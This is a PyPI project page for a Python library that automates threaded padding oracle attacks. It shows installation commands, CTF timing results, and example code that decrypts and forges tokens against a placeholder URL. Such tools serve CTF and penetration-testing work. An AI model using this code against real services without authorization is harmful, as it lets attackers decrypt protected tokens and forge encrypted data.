Skip to main content

Threaded padding oracle automation.

Project description

Padding Oracle Automation in Python

Python Package Badge

This script automates padding oracle attacks in Python, offering efficient and threaded execution.

Installation

You can install the script using one of these methods:

  • Via PyPI:

    pip3 install -U padding_oracle
    
  • Directly from GitHub:

    pip3 install -U git+https://github.com/djosix/padding_oracle.py.git
    

Performance

The script's performance varies depending on the number of request threads. This was tested in a CTF web challenge:

Request Threads Time Taken
1 17m 43s
4 5m 23s
16 1m 20s
64 56s

Usage

Decryption

When trying to decrypt a token like the one at https://example.com/api/?token=M9I2K9mZxzRUvyMkFRebeQzrCaMta83eAE72lMxzg94%3D, this script assumes that the token is vulnerable to a padding oracle attack.

from padding_oracle import decrypt, base64_encode, base64_decode
import requests

sess = requests.Session()  # Uses connection pooling
url = 'https://example.com/api/'

def oracle(ciphertext: bytes):
    response = sess.get(url, params={'token': base64_encode(ciphertext)})
    if 'failed' in response.text:
        return False  # Token decryption failed
    elif 'success' in response.text:
        return True
    else:
        raise RuntimeError('Unexpected behavior')

ciphertext = base64_decode('M9I2K9mZxzRUvyMkFRebeQzrCaMta83eAE72lMxzg94=')
assert len(ciphertext) % 16 == 0

plaintext = decrypt(
    ciphertext,
    block_size=16,
    oracle=oracle,
    num_threads=16,
)

Encryption

Below is an example demonstrating how to encrypt arbitrary bytes. For a detailed understanding of the process, please refer to this Pull Request.

from padding_oracle import encrypt

ciphertext = encrypt(
    b'YourTextHere', 
    block_size=16,
    oracle=oracle,
    num_threads=16,
)

Customized Logging

Both encrypt and decrypt allow user to inject a custom logger:

  • Disable Logging:

    from padding_oracle import nop_logger
    
    plaintext = decrypt(
        ...
        logger=nop_logger,
    )
    
  • Selective Logging:

    def logger(kind: str, message: str):
        if kind in ('oracle_error', 'solve_block_error'):
            print(f'[{kind}] {message}')
    
    plaintext = decrypt(
        ...
        logger=logger,
    )
    

Extras

The script also includes PHP-like encoding and decoding functions:

from padding_oracle.encoding import urlencode, urldecode, base64_encode, base64_decode

TODO

  • Support more padding schemes

License

This script is distributed under the MIT license.

Project details


Download files

Download the file for your platform. If you're not sure which to choose, learn more about installing packages.

Source Distribution

padding_oracle-0.4.1.tar.gz (8.5 kB view details)

Uploaded Source

Built Distribution

padding_oracle-0.4.1-py3-none-any.whl (10.0 kB view details)

Uploaded Python 3

File details

Details for the file padding_oracle-0.4.1.tar.gz.

File metadata

  • Download URL: padding_oracle-0.4.1.tar.gz
  • Upload date:
  • Size: 8.5 kB
  • Tags: Source
  • Uploaded using Trusted Publishing? No
  • Uploaded via: twine/4.0.2 CPython/3.9.18

File hashes

Hashes for padding_oracle-0.4.1.tar.gz
Algorithm Hash digest
SHA256 172ff1ad292d9a9bb779bbc0c24c8c0607e028bd4fa3e8d6b7fead5983dcf6e8
MD5 62b77a6b933d96710e78fa51cdac4755
BLAKE2b-256 46f47e5ee1936f8af70b8368e87da09ba97ed54a2ad6a193f5e6d3ca0e3474f0

See more details on using hashes here.

File details

Details for the file padding_oracle-0.4.1-py3-none-any.whl.

File metadata

File hashes

Hashes for padding_oracle-0.4.1-py3-none-any.whl
Algorithm Hash digest
SHA256 5642b4c016d4d424a7d5970d0c38f4dd7bfcf0cf367d02301083283167dde7fc
MD5 4325e5e170987415fb6419b9472de9b4
BLAKE2b-256 21f44dd4b3d49e85f3589aeae071fa3759106b05b7c900c127f1e95e757d3b47

See more details on using hashes here.

Supported by

AWS AWS Cloud computing and Security Sponsor Datadog Datadog Monitoring Fastly Fastly CDN Google Google Download Analytics Microsoft Microsoft PSF Sponsor Pingdom Pingdom Monitoring Sentry Sentry Error logging StatusPage StatusPage Status page